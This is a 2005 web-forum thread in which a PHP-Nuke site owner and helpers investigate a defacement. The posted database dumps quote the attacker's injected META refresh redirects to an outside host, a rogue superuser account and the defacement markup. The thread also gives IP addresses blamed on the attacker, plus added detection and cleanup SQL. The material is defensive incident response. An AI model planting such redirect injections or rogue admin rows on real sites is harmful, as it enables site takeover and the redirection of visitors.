mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 8:31 am

What info can I provide to help find out how this happened?

Nuke 7.4
Sentinel 2.1.3


Last edited by mds on Mon Jun 06, 2005 1:27 pm; edited 3 times in total

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 8:35 am

So far I have found my nuke_config table to look like this:


-- phpMyAdmin SQL Dump
-- version 2.6.1-pl3
--

--
-- Host: *******edited by me
-- Generation Time: Jun 06, 2005 at 07:10 AM
-- Server version: 4.0.16
-- PHP Version: 4.3.4
--
-- Database: `**********`edited by me
--

-- --------------------------------------------------------

--
-- Table structure for table `nuke_config`
--

CREATE TABLE `nuke_config` (
`sitename` varchar(255) NOT NULL default '',
`nukeurl` varchar(255) NOT NULL default '',
`site_logo` varchar(255) NOT NULL default '',
`slogan` varchar(255) NOT NULL default '',
`startdate` varchar(50) NOT NULL default '',
`adminmail` varchar(255) NOT NULL default '',
`anonpost` tinyint(1) NOT NULL default '0',
`Default_Theme` varchar(255) NOT NULL default '',
`foot1` text NOT NULL,
`foot2` text NOT NULL,
`foot3` text NOT NULL,
`commentlimit` int(9) NOT NULL default '4096',
`anonymous` varchar(255) NOT NULL default '',
`minpass` tinyint(1) NOT NULL default '5',
`pollcomm` tinyint(1) NOT NULL default '1',
`articlecomm` tinyint(1) NOT NULL default '1',
`broadcast_msg` tinyint(1) NOT NULL default '1',
`my_headlines` tinyint(1) NOT NULL default '1',
`top` int(3) NOT NULL default '10',
`storyhome` int(2) NOT NULL default '10',
`user_news` tinyint(1) NOT NULL default '1',
`oldnum` int(2) NOT NULL default '30',
`ultramode` tinyint(1) NOT NULL default '0',
`banners` tinyint(1) NOT NULL default '1',
`backend_title` varchar(255) NOT NULL default '',
`backend_language` varchar(10) NOT NULL default '',
`language` varchar(100) NOT NULL default '',
`locale` varchar(10) NOT NULL default '',
`multilingual` tinyint(1) NOT NULL default '0',
`useflags` tinyint(1) NOT NULL default '0',
`notify` tinyint(1) NOT NULL default '0',
`notify_email` varchar(255) NOT NULL default '',
`notify_subject` varchar(255) NOT NULL default '',
`notify_message` varchar(255) NOT NULL default '',
`notify_from` varchar(255) NOT NULL default '',
`moderate` tinyint(1) NOT NULL default '0',
`admingraphic` tinyint(1) NOT NULL default '1',
`httpref` tinyint(1) NOT NULL default '1',
`httprefmax` int(5) NOT NULL default '1000',
`CensorMode` tinyint(1) NOT NULL default '3',
`CensorReplace` varchar(10) NOT NULL default '',
`copyright` text NOT NULL,
`Version_Num` varchar(10) NOT NULL default '',
PRIMARY KEY (`sitename`),
FULLTEXT KEY `copyright` (`copyright`),
FULLTEXT KEY `Version_Num` (`Version_Num`)
) TYPE=MyISAM;

--
-- Dumping data for table `nuke_config`
--

INSERT INTO `nuke_config` VALUES ('&lt;font class=&quot;content&quot;&gt;&lt;META http-equiv=refresh', '<font class="content"><META http-equiv=refresh', 'logo.jpg', '&lt;font class=&quot;content&quot;&gt;&lt;META http-equiv=refresh', '<font class="content"><META http-equiv=refresh', '<font class="content"><META http-equiv=refresh', 0, 'Sand_Journey', '<font class="content"><META http-equiv=refresh \r\ncontent=0;URL=http://k.domaindlx.com/kayrahakan/html.html>\r\n', '<font class="content"><META http-equiv=refresh \r\ncontent=0;URL=http://k.domaindlx.com/kayrahakan/html.html>\r\n', '<font class="content"><META http-equiv=refresh \r\ncontent=0;URL=http://k.domaindlx.com/kayrahakan/html.html>\r\n', 4096, 'Anonymous', 5, 1, 1, 1, 1, 10, 10, 1, 30, 0, 1, '&lt;font class=&quot;content&quot;&gt;&lt;META http-equiv=refresh', 'en-us', 'english', 'en_US', 0, 0, 0, 'editedmymail', 'NEWS for my site', 'Hey! You got a new submission for your site.', 'webmaster', 0, 1, 1, 500, 3, '*****', 'Web site engine code is Copyright &copy; 2003 by <a href="http://phpnuke.org"><font class="footmsg_l">PHP-Nuke</font></a>. All Rights Reserved. PHP-Nuke is Free Software released under the <a href="http://www.gnu.org"><font class="footmsg_l">GNU/GPL license</font></a>. ', '7.4');

Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 15235
Location: Kansas

Posted: Mon Jun 06, 2005 9:16 am

Did they add an admin into your authors table?

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 9:20 am

Yes, just found this info in nuke_authors:

-- phpMyAdmin SQL Dump
-- version 2.6.1-pl3
--

--
-- Host: localhost
-- Generation Time: Jun 06, 2005 at 08:21 AM
-- Server version: 4.0.16
-- PHP Version: 4.3.4
--
-- Database: `**`
--

-- --------------------------------------------------------

--
-- Table structure for table `nuke_authors`
--

CREATE TABLE `nuke_authors` (
`aid` varchar(25) NOT NULL default '',
`name` varchar(50) default NULL,
`url` varchar(255) NOT NULL default '',
`email` varchar(255) NOT NULL default '',
`pwd` varchar(40) default NULL,
`counter` int(11) NOT NULL default '0',
`radminarticle` tinyint(2) NOT NULL default '0',
`radmintopic` tinyint(2) NOT NULL default '0',
`radminuser` tinyint(2) NOT NULL default '0',
`radminsurvey` tinyint(2) NOT NULL default '0',
`radminlink` tinyint(2) NOT NULL default '0',
`radminfaq` tinyint(2) NOT NULL default '0',
`radmindownload` tinyint(2) NOT NULL default '0',
`radminreviews` tinyint(2) NOT NULL default '0',
`radminnewsletter` tinyint(2) NOT NULL default '0',
`radminforum` tinyint(2) NOT NULL default '0',
`radmincontent` tinyint(2) NOT NULL default '0',
`radminency` tinyint(2) NOT NULL default '0',
`radminsuper` tinyint(2) NOT NULL default '1',
`admlanguage` varchar(30) NOT NULL default '',
PRIMARY KEY (`aid`),
KEY `aid` (`aid`)
) TYPE=MyISAM;

--
-- Dumping data for table `nuke_authors`
--

INSERT INTO `nuke_authors` (`aid`, `name`, `url`, `email`, `pwd`, `counter`, `radminarticle`, `radmintopic`, `radminuser`, `radminsurvey`, `radminlink`, `radminfaq`, `radmindownload`, `radminreviews`, `radminnewsletter`, `radminforum`, `radmincontent`, `radminency`, `radminsuper`, `admlanguage`) VALUES ('kralkayra', 'God', 'http://', '', '4297f44b13955235245b2497399d7a93', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, '');

Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 15235
Location: Kansas

Posted: Mon Jun 06, 2005 9:23 am

Do you have the Admin and Author blocker settings turned on in your NukeSentinel(tm) Configuration?

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 9:28 am

That's what I am trying to remember now... I'm thinking no... I had just updated to the new version and yesterday imported info for the ip2c for USA and Canada Confused Evil or Very Mad

Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 15235
Location: Kansas

Posted: Mon Jun 06, 2005 9:38 am

Well, activate it immediately, then drop that record from the author's table and recreate your admin id/pass.

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 9:41 am

I can't get to my site C/P yet. I need to change the "god" account; they have changed this and deleted all other admin accounts... Can you give me a quick DB insert (info only) so I can get "god access" again? For some stupid reason I'm not getting in my C/P, probably 'cause I'm frustrated and overlooking something.

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 9:44 am

I've tried to edit the info... username and password, and it's still not letting me in.

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 9:51 am

Also, it's Sentinel 2.2.0, not 2.1.3 as stated above.

And I am in to my admin C/P now.

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 9:56 am

Raven wrote:
Do you have the Admin and Author blocker settings turned on in your NukeSentinel(tm) Configuration?


No, they were not activated but are now!! I'm such a blockhead Bang Head

What's the site I've seen mentioned about PC killer, or info on what it is????

Is this something I should report to someone? And if so, who do I send it to? Sorry for the "newbie" type questions, still learning what I can about all this.

THANKS FOR BEING HERE GREATLY APPRECIATED


Last edited by mds on Mon Jun 06, 2005 9:58 am; edited 1 time in total

Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 15235
Location: Kansas

Posted: Mon Jun 06, 2005 9:58 am

Use phpMyAdmin and edit your author's table.

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 10:01 am

Raven wrote:
Well, activate it immediately, then drop that record from the author's table and recreate your admin id/pass.


Should I drop the whole nuke_authors table and start that table from scratch? (7.4 original SQL)

Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 15235
Location: Kansas

Posted: Mon Jun 06, 2005 10:11 am

Just empty it.

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 10:22 am

They have also joined as a member:

INSERT INTO `nuke_users` (`user_id`, `name`, `username`, `user_email`, `femail`, `user_website`, `user_avatar`, `user_regdate`, `user_icq`, `user_occ`, `user_from`, `user_interests`, `user_sig`, `user_viewemail`, `user_theme`, `user_aim`, `user_yim`, `user_msnm`, `user_password`, `storynum`, `umode`, `uorder`, `thold`, `noscore`, `bio`, `ublockon`, `ublock`, `theme`, `commentmax`, `counter`, `newsletter`, `user_posts`, `user_attachsig`, `user_rank`, `user_level`, `broadcast`, `popmeson`, `user_active`, `user_session_time`, `user_session_page`, `user_lastvisit`, `user_timezone`, `user_style`, `user_lang`, `user_dateformat`, `user_new_privmsg`, `user_unread_privmsg`, `user_last_privmsg`, `user_emailtime`, `user_allowhtml`, `user_allowbbcode`, `user_allowsmile`, `user_allowavatar`, `user_allow_pm`, `user_allow_viewonline`, `user_notify`, `user_notify_pm`, `user_popup_pm`, `user_avatar_type`, `user_sig_bbcode_uid`, `user_actkey`, `user_newpasswd`, `points`, `last_ip`)

VALUES (401, '', 'kralkayra', '', '', '', 'gallery/blank.gif', 'Jun 06, 2005', NULL, NULL, NULL, '', NULL, NULL, NULL, NULL, NULL, NULL, '4297f44b13955235245b2497399d7a93', 10, '', 0, 0, 0, '', 0, '', '', 4096, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 10, NULL, 'english', 'D M d, Y g:i a', 0, 0, 0, NULL, 1, 1, 1, 1, 1, 1, 0, 0, 0, 3, NULL, NULL, NULL, 0, '0');

Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 15235
Location: Kansas

Posted: Mon Jun 06, 2005 10:32 am

Delete it.

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 10:41 am

Yup, I did... why wasn't the IP listed?

Looks like all that was done was they added this info to my news module and deactivated 1 of my blocks that I reactivated:

TITLE :

<b><b><marquee><h1>Hacked by KRALKAYRA</h1></marquee></b></font></center><br></b>


Content:

<b><b><marquee><h1>Hacked by KRALKAYRA</h1></marquee></b></font></center><br></b>
<br><br><b>HACKER BY KRALKAYRA</b> <a target='top' href='kralkayra'><br>
<img border=0 src=http://kralkayrahan.sitemynet.com/logo2.gif></a>
<b>HACKER BY KRALKAYRA</b>
<b><b><marquee><h1>Hacked by KRALKAYRA</h1></marquee></b></font></center><br></b>

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Jun 06, 2005 11:00 am

Shouldn't the IP have been logged in Sentinel?

If so, if I was to re-enter his name into the nuke_members, the IP should be with the user name logged in Sentinel tracked IPs, right?

TheLoneInventor
New Member


Joined: Jun 06, 2005
Posts: 7
Location: Oregon, USA

Posted: Mon Jun 06, 2005 7:16 pm

Wow, this fellow has been busy... Sorry I missed this thread Raven

mds, you can see the topic I posted about an attack from the same hacker on the 4th

Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 15235
Location: Kansas

Posted: Mon Jun 06, 2005 10:41 pm

mds wrote:
Shouldn't the IP have been logged in Sentinel?

If so, if I was to re-enter his name into the nuke_members, the IP should be with the user name logged in Sentinel tracked IPs, right?

You could use phpMyAdmin and just submit a query against the nsnst_tracked_ips table for his user_id.
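
The checks this thread walks through (rogue superuser in nuke_authors, tampered nuke_config, the matching member row, the tracked-IP lookup), collected as queries for phpMyAdmin. This is an added example, not part of any post above; `my_admin` is a placeholder for your own admin id, and the `nuke_stories` table and its columns are assumed from a stock PHP-Nuke install rather than taken from the dumps.

```sql
-- Added example, not from the thread. Table and column names are taken from
-- the dumps posted above unless marked "assumed". No subqueries are used, so
-- the statements run on the MySQL 4.0 server shown in the dump header.
-- 'my_admin' is a placeholder for the admin id you created yourself.

-- 1. Superusers you did not create.
SELECT aid, name, email, pwd
FROM nuke_authors
WHERE radminsuper = 1
  AND aid <> 'my_admin';

-- 2. Site settings carrying the injected redirect. nuke_config holds a single
--    row; the pattern matches both the raw and the entity-encoded
--    "META http-equiv=refresh" values seen in the dump.
SELECT sitename, nukeurl, slogan, startdate, adminmail,
       foot1, foot2, foot3, backend_title
FROM nuke_config
WHERE CONCAT(sitename, nukeurl, slogan, startdate, adminmail,
             foot1, foot2, foot3, backend_title) LIKE '%http-equiv%';

-- 3. Member rows that reuse an admin row's password hash. In this incident
--    the rogue admin and member 401 carry the same hash, and last_ip on the
--    member row is '0', so the row itself gives no source address.
SELECT u.user_id, u.username, u.user_regdate, u.last_ip, a.aid
FROM nuke_users AS u
INNER JOIN nuke_authors AS a ON a.pwd = u.user_password
WHERE a.aid <> 'my_admin';

-- 4. Defaced news items (nuke_stories and its columns are assumed).
SELECT sid, aid, title, `time`
FROM nuke_stories
WHERE title LIKE '%<marquee%'
   OR hometext LIKE '%<marquee%';

-- 5. Tracked requests for the rogue member, by id or by name. Use the table
--    name exactly as phpMyAdmin lists it; it may carry your table prefix.
SELECT *
FROM nsnst_tracked_ips
WHERE user_id = 401
   OR username = 'kralkayra';

-- 6. After saving the output of 1-5 as evidence, remove the rogue rows.
DELETE FROM nuke_authors WHERE aid = 'kralkayra';
DELETE FROM nuke_users WHERE user_id = 401 AND username = 'kralkayra';
```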
persona_non_grata



Joined:
Posts: 0

Posted: Tue Jun 07, 2005 7:38 am

Well, sorry, but I had to do it...
The hacker "kayrahakan" had his shitty account at

see in post... http://k.domaindlx.com/kayrahakan/

So I mailed the host of the free stuff and they responded with:


The site has been terminated.
Regards,
Domain DLX Abuse Department



Now that was easy.

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Tue Jun 07, 2005 8:03 am

I ran the search twice, using the user_id (401, which if he would've registered regularly should've been 399... SQL injection??)
and by username (kralkayra), and both returned no results...

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Tue Jun 07, 2005 8:14 am

TheLoneInventor wrote:
Wow, this fellow has been busy... Sorry I missed this thread Raven

mds, you can see the topic I posted about an attack from the same hacker on the 4th


Thanks for the link

**Raven**
It's not much, but I did send a donation!! Thank you for everybody's help!! And this great site

TheLoneInventor
New Member


Joined: Jun 06, 2005
Posts: 7
Location: Oregon, USA

Posted: Tue Jun 07, 2005 8:18 pm

mds,

I've got the guy's IPs if you want them. I picked them up with the protector system, which he got through, as well as the IP tracking module, so I have an idea of where he was going as well.

68.23.169.128 - adsl-68-23-169-128.dsl.chcgil.ameritech.net
was the one last used to access my site... I notified this host of abuse, evidently an SBDC ISP out of Plano, Texas.

65.19.134.2 - is the one I believe was used to hack the site, through the forums by the look of it. 2608 URLs were hit by this IP from the kralkayra username.

Hope that helps.

mds
Client


Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Tue Jun 07, 2005 10:26 pm

Excellent

That IP looks very familiar to me... I think I've seen it in my access logs, but didn't show them as accessing any admin files... guess I better go back and have a better looky-see Smile

thank you again